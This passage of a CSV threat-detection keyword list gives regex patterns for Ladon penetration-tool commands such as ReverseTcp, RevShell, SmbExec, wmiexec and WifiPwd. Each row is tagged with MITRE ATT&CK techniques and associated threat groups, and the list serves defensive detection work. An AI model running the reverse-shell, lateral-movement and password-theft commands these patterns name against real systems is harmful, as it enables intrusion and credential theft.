*",".{0,1000}Ladon\sReadFile\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon RegAuto*",".{0,1000}Ladon\sRegAuto.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon ReverseHttps*",".{0,1000}Ladon\sReverseHttps.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon ReverseTcp *",".{0,1000}Ladon\sReverseTcp\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon RevShell-*",".{0,1000}Ladon\sRevShell\-.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon Runas*",".{0,1000}Ladon\sRunas.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon RunPS *",".{0,1000}Ladon\sRunPS\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon sc *",".{0,1000}Ladon\ssc\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon SetSignAuth*",".{0,1000}Ladon\sSetSignAuth.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon SmbExec *",".{0,1000}Ladon\sSmbExec\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon Sniffer*",".{0,1000}Ladon\sSniffer.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon SshExec *",".{0,1000}Ladon\sSshExec\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon SweetPotato*",".{0,1000}Ladon\sSweetPotato.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon TcpServer *",".{0,1000}Ladon\sTcpServer\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon UdpServer*",".{0,1000}Ladon\sUdpServer.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon WebShell*",".{0,1000}Ladon\sWebShell.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon whoami*",".{0,1000}Ladon\swhoami.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon WifiPwd*",".{0,1000}Ladon\sWifiPwd.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon wmiexec*",".{0,1000}Ladon\swmiexec.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon WmiExec2 *",".{0,1000}Ladon\sWmiExec2\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - 